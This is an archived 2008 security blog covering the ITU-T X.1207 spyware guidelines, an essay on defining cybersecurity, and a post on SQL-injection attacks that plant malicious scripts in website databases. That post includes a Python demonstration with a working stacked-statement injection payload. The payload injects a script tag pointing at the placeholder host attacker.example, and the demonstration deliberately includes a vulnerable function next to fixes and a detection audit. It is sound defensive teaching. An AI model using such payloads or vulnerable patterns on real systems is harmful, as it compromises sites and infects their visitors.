Bright Stove

Reflecting information risk journey

Archive for May 2008

X.1207 approved


X.1207 "Guidelines for Telecommunication Service Providers and End-users for Addressing the Risk of Spyware and Potentially Unwanted Software" was determined and then underwent a six-month review by ITU-T members from October 2007 to April 2008 (see my earlier blog entry on this topic). At the April 2008 ITU-T SG 17 meeting in Geneva, the draft Recommendation was approved. It is now a formal ITU-T X.1207 Recommendation. Soft copies (in different formats) of the Recommendation are now available from the ITU-T web site at
Besides X.1207, ITU-T SG 17 also published a number of other cybersecurity-related standards following the April 2008 meeting. Details are in the ITU-T Study Group 17 web log entry.

Written by mengchow

May 26, 2008 at 7:32 am

Posted in Security Standards

Revolving security


Revolving restaurants are often a hit with children. They are also attractions for adults, but mostly on special occasions; otherwise they are expensive places to dine. The two groups, however, are intrigued by different aspects of the technology at the centre of the concept. Adults like that the restaurant provides a panoramic view of the area: the changing scenery can be enjoyed through the all-glass windows as the restaurant revolves around the axle of the tall tower. Children, as I observed and experienced as a kid, are mostly intrigued by the internal changes that the movement produces. The food serving area, in particular, is next to the table at one point and has moved away at another, creating opportunities for hide-and-seek type games of chasing it around. For both groups, the cost and the contents (i.e., the food) are not the main things in the experience.
Information security issues are like a revolving restaurant in many regards. People and organizations look at them from different perspectives, depending on whether they are sitting by the window or near the revolving axle where the food and drinks are served, and on their maturity or awareness level, i.e., the different views through the windows as the restaurant revolves. For example, government organizations tend to focus on the confidentiality of information because of their knowledge of and concerns over national security. People in general worry about their privacy once they know it can be compromised and stolen; otherwise they worry more about viruses and malware, having been hurt by them before. Private enterprises tend to focus on access controls, since these are easier and less costly to implement than content protection; they also worry about malware and viruses, since most of them have been hurt by such attacks as well. The technology that gets deployed, and when, depends on this area of focus (i.e., where they sit). Nobody, however, likes the cost and effort involved in implementing information security, and except for information security professionals, most users and organizations care even less about the elegance and innovation in information security technology (i.e., the food and drinks).
This week, in Hong Kong, I was invited to speak at four security gatherings, and also met with a few senior people to discuss security policy and strategy issues and solutions. Since the beginning of the year there has been a series of incidents relating to information breaches: beginning with a Hong Kong singer/actor's personal files being compromised by a computer repair technician and shared online, to a bank having a server stolen from a branch, leaving 159,000 customer records in an "unknown" status, to a government department losing private data, and public hospital staff losing a USB thumb drive containing 10,000 patient records in a taxi. So, naturally, sitting next to a window with such a view revolving in front of Hong Kongers, the focus is on information protection now.
Virus attacks, malware infections, and even the current wave of web application attacks that use SQL injection but target end users as the ultimate victims attracted less interest from these audiences (they are not sitting next to the food and drinks, where I sit). The latter is in fact an emerging risk that is already affecting many web sites in the Asia Pacific and Greater China regions. Many web site owners do not even know that their sites have been compromised, because the attackers' tactics are subtle. They use SQL injection to reach the database behind the web application. Instead of corrupting, modifying, or retrieving the data held there, they plant their exploit code in it: typically a script reference written into the text columns that the application later displays. When the web application is then accessed by end users, normally the customers of the organization involved, the planted code is served out by the application in the usual manner, the users' browsers load it, and bingo, the end-user systems are infected and become victims if they lack the necessary protection against the exploit. For those of you involved in securing your organization's web servers, or concerned about this attack and wanting to make sure your web sites are secure against it, there are a few useful URLs that provide guidance on how to do so.
These attacks do not capitalize on new security loopholes. They are an old, known problem, the lack of input validation, that has revolved back into our view, presented in a slightly different manner.
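The mechanism described above, as an added example that is not part of the original post: a small Python script (standard library only) built around a constructed product table in an in-memory SQLite database. The vulnerable update pastes a product id from the request into the SQL and runs it as a batch, which stands in for a database that executes stacked statements in one request, the behaviour the attacks above relied on; one crafted id then appends a script tag (pointing at a placeholder attacker.example host) to every description in the table. The fixed version validates the input type and binds the parameter, the safe renderer encodes on output so already-planted content is served as inert text, and the audit function walks every text column looking for script-like content, the check a site owner who does not yet know the site is compromised would want to run. The `||` concatenation is SQLite syntax; other databases spell it differently, but the pattern is the same.

```python
import html
import re
import sqlite3

# Constructed sample payload: the script reference an attacker wants every page
# to serve to its visitors. The host name is a placeholder, not a real site.
ATTACKER_SCRIPT = '<script src="http://attacker.example/x.js"></script>'

# Matches the most common planted content: script tags, iframes, javascript: URLs.
PLANTED_RE = re.compile(r"<script\b|<iframe\b|javascript:", re.IGNORECASE)


def make_db():
    """Constructed product catalogue of the kind a small e-commerce site keeps."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (
            id INTEGER PRIMARY KEY,
            name TEXT,
            description TEXT,
            views INTEGER DEFAULT 0
        );
        INSERT INTO products (id, name, description) VALUES (1, 'Kettle', 'Boils water.');
        INSERT INTO products (id, name, description) VALUES (2, 'Toaster', 'Browns bread.');
        """
    )
    return conn


def record_view_vulnerable(conn, product_id):
    """Vulnerable: the id from the request is pasted straight into the SQL.

    executescript() runs whatever the string contains, standing in for a
    database that executes stacked statements in one batch. A request such as
        ?id=1; UPDATE products SET description = description || '<script ...>'
    increments the view counter and then rewrites every description.
    """
    conn.executescript(
        "UPDATE products SET views = views + 1 WHERE id = " + product_id + ";"
    )


def record_view_fixed(conn, product_id):
    """Fixed: validate the input type, then bind it as a parameter.

    int() rejects anything that is not a number (raising ValueError), and the
    placeholder guarantees the value can never be parsed as SQL.
    """
    conn.execute(
        "UPDATE products SET views = views + 1 WHERE id = ?", (int(product_id),)
    )


def all_descriptions(conn):
    """Return every description in id order (used to inspect the effect)."""
    return [row[0] for row in conn.execute(
        "SELECT description FROM products ORDER BY id")]


def render_description_unsafe(conn, product_id):
    """Unsafe: whatever is in the column goes to the browser verbatim."""
    row = conn.execute(
        "SELECT description FROM products WHERE id = ?", (product_id,)).fetchone()
    return "<p>" + row[0] + "</p>"


def render_description_safe(conn, product_id):
    """Second layer: encode on output, so planted tags render as text."""
    row = conn.execute(
        "SELECT description FROM products WHERE id = ?", (product_id,)).fetchone()
    return "<p>" + html.escape(row[0]) + "</p>"


def find_planted_script(conn):
    """Audit every TEXT column of every table for script-like content.

    Returns (table, column, rowid) triples. Table and column names come from
    the schema itself, not from user input, so interpolating them is safe here.
    """
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite_%' ORDER BY name")]
    for table in tables:
        text_cols = [r[1] for r in conn.execute(f"PRAGMA table_info({table})")
                     if (r[2] or "").upper() == "TEXT"]
        for col in text_cols:
            for rowid, value in conn.execute(
                    f'SELECT rowid, "{col}" FROM "{table}" ORDER BY rowid'):
                if value and PLANTED_RE.search(value):
                    hits.append((table, col, rowid))
    return hits


if __name__ == "__main__":
    db = make_db()
    payload = "1; UPDATE products SET description = description || '" + ATTACKER_SCRIPT + "'"
    record_view_vulnerable(db, payload)      # one request poisons the whole table
    print(all_descriptions(db))
    print(render_description_unsafe(db, 2))  # serves the attacker's script
    print(render_description_safe(db, 2))    # same row, rendered inert
    print(find_planted_script(db))           # [('products', 'description', 1), ('products', 'description', 2)]
    try:
        record_view_fixed(make_db(), payload)
    except ValueError as err:
        print("rejected:", err)              # the fixed path never reaches the database
```

Run it as a script to see both the poisoned table and the two defences side by side. Parameter binding stops the injection; output encoding stops delivery of anything that was planted earlier by some other route; the audit catches what is already there. Each covers a failure of the others, which is the point about defense-in-depth made below.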
Reflecting on these developments, they remind us of the importance of defense-in-depth: not simply building layers of defenses, but making sure that we look into the security needs at every layer. Increasingly, the proliferation of information devices has made information, or data, the window view that we see. But protecting it requires action at the other layers at the same time: application, operating system, network, physical, and people. While we enjoy the panoramic view from the revolving restaurant, we should also try to enjoy the food and drinks, to make the cost and effort worthwhile.
Happy dining!

Written by mengchow

May 23, 2008 at 6:32 am

Posted in Risk Management

What is Cybersecurity


While a new standard on "Guidelines for Cybersecurity" (27032) is being developed in ISO/IEC JTC 1/SC 27/WG 4, the question "what is cybersecurity" continues to be asked and debated by members of SC 27, in particular those who have been active in WG 4. From the various meetings and side conversations I had with individual WG 4 experts two weeks ago in Kyoto, it is clear that many hold different views and opinions of the notion of Cybersecurity. In one of the previous meetings there was also discussion on whether it should be two words or one, i.e., "Cyber security" or "Cybersecurity". The latter seems more commonly used nowadays (than, say, five years ago), and people who use the single word probably hold a different view of Cybersecurity from those who use two words to denote their understanding of Cyber security. Perhaps Cyber security, as two words, also seems more user friendly, as it is not flagged as a spelling error by the spell checker. In the near future, I would think, the single word will be accepted by most modern dictionaries.
There are two areas that I wish to discuss relating to Cybersecurity (and Cyber security). One relates to the scope of focus that needs attention and action; the other, which relates to my role as Convener of WG 4, is the role of standards in Cybersecurity (or Cyber security). Given the space and time here, I will blog about the latter in a later post.
In many ways, Cybersecurity issues (I am using the one-word form since it saves one "space" character) are quite similar to green environment issues. Many years ago, companies that built chemical plants and factories were concerned only with the safety measures of their own facilities, if they were concerned about safety at all, and in most cases did not care much about disposing of the toxic waste their factories generated in a safe manner, especially if the toxicity was assessed as mild. That waste therefore ended up polluting the environment, until governments and/or civil activists raised the issue and had regulators impose tough measures against such inconsiderate practices. Cybersecurity is quite similar in nature, but need not wait for activists or governments to make the first move. As we all (in WG 4) agree, it is about the security of Cyberspace. Some experts believe that Cybersecurity is the same as Internet security, network security, or information security, and that there is therefore no need to study it as a topic or to have standards to help improve it. I would differ on this. If we take the enterprise view of Internet, network, or information security, companies' focus will be on securing their own Internet presence/business, their own corporate network, and their own information, just like the chemical factory owners of the past. Anything outside their business (even for some governments) will be something for others to care about, not them; after all, they are answerable only to their shareholders, not to users of Cyberspace in general. If we do not take care of it, we will not be able to make use of it reliably and securely, either for business or to support our digital lifestyle.
In fact, the notion of Cyberspace itself may be hard to grasp, as it is simply too "soft" a concept. I say it is a concept because it does not exist in any physical form; rather, it emerges from the Internet, plus the people, organizations, and activities on all sorts of technology devices and networks connected to it. It is perhaps best described as a virtual environment.
Cyberspace security is therefore very much the virtual world's equivalent of a safe/green environment in the physical world. This is one of the reasons that Cybersecurity is such a challenging topic, just like green environment issues. So what are the problems when companies look after only their own network and information security needs, without considering the needs of Cybersecurity? I can think of a few.
Take Internet web hosting services as an example. A web hosting service provider's focus on security would be on the security of the web sites it hosts (if it thinks about security at all), so that its tenants are satisfied with their security and continue to pay rent every month; if a site gets hacked, the tenant will consider moving to a more secure provider. However, without considering the security issues in Cyberspace beyond network or Internet security, we get what happened just a few years ago: some spammers, phishers, and even botnet controllers started renting their Internet presence from web hosting services, with validly registered domain names, instead of on hacked servers. As long as they pay their rent, the web hosting service providers would not bother whether their tenants are running a spamming or phishing web site. After all, their web sites are not being attacked, and their business would be affected if they did not have the rental fees to collect. To the law enforcement agencies, however, it will be a challenge to take down the related crime syndicate, and they will also need to apply to the courts for permission to do their work. This is the kind of issue that sits at the edge of a company's Internet space. It is often a cost to the business, and when they spend resources on it they do not see clear returns, either in goodwill or in revenue. The ITU-T SG 17 Q6 X.1207 Recommendation is one of the standards that tries to highlight this sort of issue in relation to spyware and provide guidance on best practices.
Beyond this kind of challenge are security issues resulting from new phenomena we are observing and experiencing in Cyberspace, relating to developments like Second Life, Facebook, MySpace, blogging, instant messaging, and many more Web 2.0 innovations for the new digital lifestyle and workstyle. Each of these communities or social networking developments has some unique security issues to be considered, besides providing a new platform for old problems to live again (in a more innovative manner). For example, instant messaging has become a new platform for virus and worm distribution, child exploitation, and many old crimes, while at the same time introducing new capabilities for new forms of social engineering attack. Virtual world environments of the Second Life type have also brought new crimes between the physical world and the Cyberworld, since real money is exchanged somewhere between the two, and real people operate and use these virtual spaces.
Some experts believe that Cybersecurity relates to critical infrastructure protection as well. This is not necessarily an incorrect view, since the availability and reliability of Cyberspace in many instances rely on the availability and reliability of certain critical infrastructure services (e.g., the telecommunications network infrastructure). From another perspective, dealing with Cybersecurity issues requires substantial communication and coordination between different private and public entities from different countries and organizations; again, this is also the kind of challenge found in critical infrastructure protection. The things we learn and do in critical infrastructure protection may therefore help in improving Cybersecurity. However, there is another issue. Critical infrastructure services, to some governments, are regarded as national security related services, and therefore not always something for the public to decide what to do about and how. Furthermore, knowledge of critical infrastructure weaknesses, if not used appropriately, could affect national security directly. Critical infrastructure services such as water and gas, however, do not contribute to Cybersecurity issues; on the other hand, the lack of Cybersecurity protection may impact these services if their operations are connected to Cyberspace, and even if they are not today, many would envisage that they will be one day. The overlaps, or the influence, between critical infrastructure protection and Cybersecurity may therefore be complex.
In summary, the discussion above, if it has not confused you, demonstrates one thing. Each of these areas, be it critical infrastructure protection, information security, Internet security, or network security, has its own objectives and scope of focus. Critical infrastructure protection overlaps by far the most with the other things we try to do, but it focuses on reliability, availability, and coordination more than anything else. Information security, network security, and Internet security are just fundamental pieces, which must be accomplished before we can talk about critical infrastructure protection. Cybersecurity similarly has its own scope and objectives, which relate to the security things that organizations and individuals should be doing for the common security good of the Cyberspace environment. Cybersecurity also relies on information security, network security, and Internet security as fundamental building blocks. Cybersecurity is what we need for critical infrastructure protection as well, besides the other aspects involved. At the same time, adequate protection of critical infrastructure also contributes to the basic security needs (i.e., the security, reliability, and availability of critical infrastructure) for achieving the goals of Cybersecurity.

Written by mengchow

May 8, 2008 at 2:35 pm
